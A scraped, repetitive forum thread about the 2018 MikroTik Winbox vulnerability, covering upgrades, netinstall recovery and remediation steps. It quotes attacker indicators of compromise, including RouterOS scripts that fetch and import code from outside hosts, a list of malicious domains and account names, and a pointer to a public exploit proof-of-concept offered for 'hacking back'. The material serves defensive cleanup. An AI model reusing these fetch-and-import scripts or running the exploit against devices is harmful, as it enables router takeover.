Your firewall should not allow people to access your router.As for who does not have the user and password of the Routerboard Expecific, is there the possibility of access in root mode and exploit this vulnerability?
Okay, so only people that have username and password can exploit the vulnerability? Or all people can access with vulnerability root even if you have not username and password for the routerboard?Your firewall should not allow people to access your router.As for who does not have the user and password of the Routerboard Expecific, is there the possibility of access in root mode and exploit this vulnerability?
If you have updated RouterOS, nobody can exploit this vulnerability.
Thanks, I was hoping for such an updateAs alredy reported multiple times, in April 2018 MikroTik fixed a vulnerability in the Winbox server component, which allowed an attacker to gain access to your RouterOS device, if the Winbox port was opened to untrusted networks. Most MikroTik devices include a default firewall that prevents this, but for different reasons, the firewall is sometimes turned off by the user.
The issue was already fixed, but a new method of exploitation has recently been revealed, so we urge all MikroTik users to upgrade their RouterOS versions.
Note: THIS IS THE SAME ISSUE THAT WAS ALREADY FIXED IN APRIL. Only a new way to use the same vulnerability was revealed now.
More details here: https://blog.mikrotik.com/security/new- ... ility.html
Please share this link with colleagues, employees, customers and other MikroTik users.
Thank's!Cassio, please read the blog entry that was linked in first post. It answers all your questions and more;
https://blog.mikrotik.com/security/winb ... ility.html
We should have automatic security updates. Security updates are different than feature upgrades and for mission critical devices such as routers, security updates should be included.I don't agree with "automatic update" we already have too many problems with windows 10 (like the last update that erased a lot of data?) we don't want that with mikrotik, i need to trust my rigs, I know I trust mikrotik as it is now.
Automatic security upgrades can ONLY be implemented, if they can be disabled. Opt-out MUST be possible.We should have automatic security updates. Security updates are different than feature upgrades and for mission critical devices such as routers, security updates should be included.I don't agree with "automatic update" we already have too many problems with windows 10 (like the last update that erased a lot of data?) we don't want that with mikrotik, i need to trust my rigs, I know I trust mikrotik as it is now.
Hi All,If the attacker scans your ports, he will find the new port number too. Upgrade anyway!
It is highly probable that attacker installed some stealth script which allows her to regain control. The only way out is to netinstall router (during that process router's NAND storage is formatted) and then configure router from scratch. It is vital not to use backup to restore configuration, text export can be handy when configuring ... but be careful not to copy any configuration bit for which you're not sure why it's there.Hi All,If the attacker scans your ports, he will find the new port number too. Upgrade anyway!
I updated my Router OS from v6.41. to v643.2, updated winbox to current version, updated admin password, still the hacker was able to get full control of the system locking me out.
What's the way out again?
Ok! that is cool. I have a backup copy of /export file, I will reload script from scratch for security measure.It is highly probable that attacker installed some stealth script which allows her to regain control. The only way out is to netinstall router (during that process router's NAND storage is formatted) and then configure router from scratch. It is vital not to use backup to restore configuration, text export can be handy when configuring ... but be careful not to copy any configuration bit for which you're not sure why it's there.Hi All,If the attacker scans your ports, he will find the new port number too. Upgrade anyway!
I updated my Router OS from v6.41. to v643.2, updated winbox to current version, updated admin password, still the hacker was able to get full control of the system locking me out.
What's the way out again?
Before loading exported configuration do inspect it in case it contains something suspicious.Ok! that is cool. I have a backup copy of /export file, I will reload script from scratch for security measure.
Sure! i will check it well.Before loading exported configuration do inspect it in case it contains something suspicious.Ok! that is cool. I have a backup copy of /export file, I will reload script from scratch for security measure.
I have question regards winbox connection mode; is it highly secure or not at all? ssh or telnet connection?
if we say winbox connection is ssh, why i see this in my logs
yes, i saw it. what does that mean? ssh or telnet connection via winbox?I have question regards winbox connection mode; is it highly secure or not at all? ssh or telnet connection?
if we say winbox connection is ssh, why i see this in my logs
After you've connected with Winbox, and then click on "New Terminal", you'll see user logged in via telnet messages.
Thanks for the link.Cassio, please read the blog entry that was linked in first post. It answers all your questions and more;
https://blog.mikrotik.com/security/winb ... ility.html
if your user account has been disabled, then Netinstall is the only option.hi, we have hundreds of mikrotik cpe with public static ip; fortunately, only a few of them (5) have a ros version afflicted by the vulnerability; they came from the factory with ros 6.40.3 , and a few hours from installation, someone use the vulnerability to change the password and lock us out. In our configuration, we also have a scheduled script that grabs the configuration from one of our servers once a day, but they disable it too...; so my question is, are there any way to bring back the control of these cpes remotely, or the only way to do it is locally with netinstall?
If it is old RouterOS and you get "bad password" it means you have access to vulnerable winbox service.
All you need to do is try the Proof of Concept: https://github.com/BasuCert/WinboxPoC It is really simple to use, all you need is python3 installed and IP/MAC of the device.
Someone hacked your device? Hack it back for yourself!![]()
add name=ip owner=admin policy=\
reboot,read,write,policy,test,password,sniff,sensitive source="{/tool fetch \
url=(\"http://www.boss-ip.com/Core/Update.ashx\\\?key=5bc24d5c0d21bf27&actio\
n=upload&sncode=EBD7A5565C5BA8CA22063E65F05533F2&dynamic=static\") keep-res\
ult=no}"
Look to see if you have any scripts, files, usernames, PPP secrets or scheduled jobs from the IOCs at the end of this article; if so, delete them. Start with scheduler as these tasks could be re-run, leading to re-configuration of the router again.
Disable web proxy, and SOCKS (if you don’t need them, or check their configuration otherwise), and check the firewall rules.
In the tools menu, check the packet sniffer.
If you don’t use PPTP server functionality, turn if off.
Check all user accounts, remove all suspicious ones, and set a strong password for the rest of them.
Now UPDATE THE FIRMWARE of the router to the latest version.
:do {/tool fetch url="http://meaghan.pythonanywhere.com/" dst-path=tmp} on-error={:put "get http error"};
/import tmp;
/file remove tmp;
domains:
gazanew.com
mining711.com
srcip.com
src-ips.com
srcips.com
hostingcloud.science
meaghan.pythonanywhere.com
scheduled jobs names:
DDNS
CrtDDNS
UpDDNS
Setschedule[1-9]_
upd[113-116]
system[111-114]
ip
a
u[3-6]
User accounts known to be connected with campaigns:
toto
dodo
files on router:
i113.rsc
i114.rsc
I116.rsc
exsvc.rsc